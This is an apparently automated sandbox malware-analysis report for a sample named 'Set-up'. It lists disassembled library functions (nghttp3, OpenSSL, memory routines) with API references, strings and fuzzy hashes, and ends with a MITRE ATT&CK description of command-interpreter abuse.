Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len$nghttp3_qpack.c
API String ID: 1222420520-645767172
Opcode ID: 2954c2e144c9afbbbe4ad0dfd35e83ce3d876de6c9e0ef6847596cd63160b40c
Instruction ID: fc275f6c4460f85fc8dd35d55f1691275f2f161e887ebac2cd4a89e9051b5f79
Opcode Fuzzy Hash: 2954c2e144c9afbbbe4ad0dfd35e83ce3d876de6c9e0ef6847596cd63160b40c
Instruction Fuzzy Hash: 1751C875A043048FD7049F2CD880B5AB7D6FB99314F09467CEC99DB392EA34DD058B56

Function 009F49A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(?,00000000,0087836A,?,?,0000012C,000000FF), ref: 009F49BA

Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7262
Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7285
Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72C5
Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72E8

Strings

OCSP_check_validity, xrefs: 009F4A05, 009F4A76, 009F4B09, 009F4B40
crypto/ocsp/ocsp_cl.c, xrefs: 009F4A0F, 009F4A7C, 009F4B0F, 009F4B4A

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strcpystrlen$_time64
String ID: OCSP_check_validity$crypto/ocsp/ocsp_cl.c
API String ID: 3821555430-713967112
Opcode ID: e988eb757e1ecf858efcde7f2d35bb9f55872d02c2d4047c435329f38ab93f53
Instruction ID: ae1f9a166bbf6b0443ca8f57b352dd86f5e63d1c798c07949d321278dc0ad524
Opcode Fuzzy Hash: e988eb757e1ecf858efcde7f2d35bb9f55872d02c2d4047c435329f38ab93f53
Instruction Fuzzy Hash: A6412476F483157BDA106AA4ED43BAF77498FC4764F048538FE0C9B382E635E91487A2

Function 008A45C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,?,?,?,?), ref: 008A468C

Strings

tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 008A4687
nghttp3_conn.c, xrefs: 008A4682

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 1222420520-4133914617
Opcode ID: 7f030682d2a0f0abd83fd9557f122c430b8c59b5ef359f7c3ebfad4c8f8ac318
Instruction ID: 3d9361a4f460d435150e670357872ac8e00ec1a1b9ab0ab447155139c922160d
Opcode Fuzzy Hash: 7f030682d2a0f0abd83fd9557f122c430b8c59b5ef359f7c3ebfad4c8f8ac318
Instruction Fuzzy Hash: EF31D3716002056BE6109A29EC85FABB7D8FFC7369F040539F959C3682E735E81487A2

Function 008A4400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 008A44B7

Strings

tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 008A44B2
nghttp3_conn.c, xrefs: 008A44AD

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 1222420520-4133914617
Opcode ID: 9616519b0cbe094a6071a0c1282656acbd5b8ab5d71fcda78e38e5c40b2488d1
Instruction ID: 13db5e2310a988b925e71dd09cebe04570f4f075c9efa92b27aa217bad178373
Opcode Fuzzy Hash: 9616519b0cbe094a6071a0c1282656acbd5b8ab5d71fcda78e38e5c40b2488d1
Instruction Fuzzy Hash: 9121D072101601AFFB105A69DC01B97779AEFCA365F080474F918C65A2FB76D424C766

Function 00B7A0C0 Relevance: 5.3, APIs: 4, Instructions: 327COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00B7A161
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00B7A2D1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00B7A3EC
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00B7A499

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 95f9a4438f778e090c26c0c2a4d0c08762f6c9ac6020e2daae0d4e46e66598a5
Instruction ID: be46c877e5aaa74e5ce72a99ee57066a2411ad547c021b6e03ac69cef7d0a735
Opcode Fuzzy Hash: 95f9a4438f778e090c26c0c2a4d0c08762f6c9ac6020e2daae0d4e46e66598a5
Instruction Fuzzy Hash: 3BC19B716042109FCB44DF28C8C8A5ABBE5FFC8314F5985ADE8699B396D771EC40CB86

Function 008A6140 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < len || offset == 0,nghttp3_stream.c,00000371,00000000,0087D7A7,?,?,0087D7A7), ref: 008A61CF

Strings

i < len || offset == 0, xrefs: 008A61CA
nghttp3_stream.c, xrefs: 008A61C5

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _assert
String ID: i < len || offset == 0$nghttp3_stream.c
API String ID: 1222420520-1528673747
Opcode ID: c620db921fd06c95b14f64c131daf5b489ddd14a3548fe1aa16331c7ac790489
Instruction ID: 1bb792c70cfc7f8a5cc1af85701e4e69090402f8fa3f58cd9c6bb5cc4ae82c56
Opcode Fuzzy Hash: c620db921fd06c95b14f64c131daf5b489ddd14a3548fe1aa16331c7ac790489
Instruction Fuzzy Hash: 3A1194755043049FE304EF69D888FA677E4FF89324F0904BDE949573A3E6306959CBA2

Function 008A8700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((blklen & 0xfu) == 0,nghttp3_balloc.c,00000022,008A88D3,00000010,?,?,00000000,008A9AE3,008AACDD,-00000010,?,?,?,00000000,?), ref: 008A873C

Strings

nghttp3_balloc.c, xrefs: 008A8732
(blklen & 0xfu) == 0, xrefs: 008A8737

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (blklen & 0xfu) == 0$nghttp3_balloc.c
API String ID: 1222420520-1502420682
Opcode ID: 99c284952771b9e7606357c1ad769ba375c9a86bde170db324764a96b464ced0
Instruction ID: 5aa452bcd39ac3bb0bb8f221169fcd875b492b97f613c24a75bd3dbd92275bde
Opcode Fuzzy Hash: 99c284952771b9e7606357c1ad769ba375c9a86bde170db324764a96b464ced0
Instruction Fuzzy Hash: BA11A179A49340AFD3129B24DC01B56BFB0FF53714F19849AE848EB293D7349C44C7A2

Function 008A89F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

_byteswap_uint64.API-MS-WIN-CRT-UTILITY-L1-1-0(FFFFFF3F,?,nghttp3_conv.c,0000003D,nghttp3_get_varint,008A5084,?,?), ref: 008A8A31

Strings

nghttp3_conv.c, xrefs: 008A8A53
nghttp3_get_varint, xrefs: 008A8A4C

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _byteswap_uint64
String ID: nghttp3_conv.c$nghttp3_get_varint
API String ID: 1624361598-912089391
Opcode ID: a8f8d806f81183d96309aac287d39e443fc633151ba169d368b3c53ea089892a
Instruction ID: 0f3740e3c9e6d5c410b1a74a8af565047cec19cb4722239094a536f0aae57e3c
Opcode Fuzzy Hash: a8f8d806f81183d96309aac287d39e443fc633151ba169d368b3c53ea089892a
Instruction Fuzzy Hash: 50F02BB19001429BD708EF34DC4163DB791EB83322F4C82E1F068CA5D4DB74C981E721

Function 008A0300 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rcbuf->ref > 0,nghttp3_rcbuf.c,0000005E,008B0B2D,5308C483,00000000,008A4D9F,?,008A0EC8), ref: 008A0333

Strings

nghttp3_rcbuf.c, xrefs: 008A0329
rcbuf->ref > 0, xrefs: 008A032E

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_rcbuf.c$rcbuf->ref > 0
API String ID: 1222420520-1879435254
Opcode ID: 8f9ce18460cbc45a07dd0e66a20aea320f0d33c4760e5ee67ac6e2ca99cf5859
Instruction ID: f980d19af9a402603cae84188b60e9f0de2320f7daa1e2f1bdd4d2e5635e86cd
Opcode Fuzzy Hash: 8f9ce18460cbc45a07dd0e66a20aea320f0d33c4760e5ee67ac6e2ca99cf5859
Instruction Fuzzy Hash: 03E0C9786006049FEE188B19D955A25B7A2FF8A722F98C198F40DCB7E2D731DC06DE51

Function 009DA170 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

Part of subcall function 009D9F60: GetStdHandle.KERNEL32(000000F4), ref: 009D9F76
Part of subcall function 009D9F60: GetFileType.KERNEL32(00000000), ref: 009D9F83
Part of subcall function 009D9F60: WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 009D9FBB

raise.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000016,009DD8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,009DDF70,?,?,?,?,?,?,?,00000000), ref: 009DA18B
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000003,?,009DD8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,009DDF70,?,?,?,?,?,?,?), ref: 009DA195

Strings

%s:%d: OpenSSL internal error: %s, xrefs: 009DA17C

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: File$HandleTypeWrite_exitraise
String ID: %s:%d: OpenSSL internal error: %s
API String ID: 2477291680-569889646
Opcode ID: 8a78c8d87912cfb289dbc57f2f04325ec8c03f1c194cd885b66e483de4f81765
Instruction ID: 66cf61b1e60696620e6c80f504fd380cb7069511da235119eca18f17b3f15443
Opcode Fuzzy Hash: 8a78c8d87912cfb289dbc57f2f04325ec8c03f1c194cd885b66e483de4f81765
Instruction Fuzzy Hash: 90C01272984346BBEB027F904C03B2AB5A5AF65700F485C6CB654141F3DB63D928E717

Function 00B84230 Relevance: 5.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0080F9BB,00000000,00815F07,?,?,0080F9BB,?), ref: 00B84266
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0080F9BB,00000000,00815F07,?,?,0080F9BB,?), ref: 00B8427A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0080F9BB,00000000,00815F07,?,?,0080F9BB,?), ref: 00B84285
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0080F9BB,00000000,00815F07,?,?,0080F9BB,?), ref: 00B84290

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: b163c695a09651f519715a03b21c3e252f745ed39e03ed8eddba180fe5b70d49
Instruction ID: a06006fa02a21447f159beacaf9b8f68087f78e0850d9cd6619841a33dffc758
Opcode Fuzzy Hash: b163c695a09651f519715a03b21c3e252f745ed39e03ed8eddba180fe5b70d49
Instruction Fuzzy Hash: 05018176A141118FEB20BF59E845D1BB7D6EF90764F4A84BDE4498B272DB31EC40CB81

Function 00B72810 Relevance: 5.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00B5D8A5,?), ref: 00B7281B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00B72826
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00B72831
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00B7283A

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 37815a2bad45aa9a7f4684050ff7ac240508b2b54459d87295df1833959e199c
Instruction ID: 69b451f20220b1ea66a3082df2d2d865f831f60949d458e16d0e83ee8ec1c20c
Opcode Fuzzy Hash: 37815a2bad45aa9a7f4684050ff7ac240508b2b54459d87295df1833959e199c
Instruction Fuzzy Hash: 74D062B6C0551057F5123A10BC0244B76D65E60738F4945B8F84961176EA12AD6597C3

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

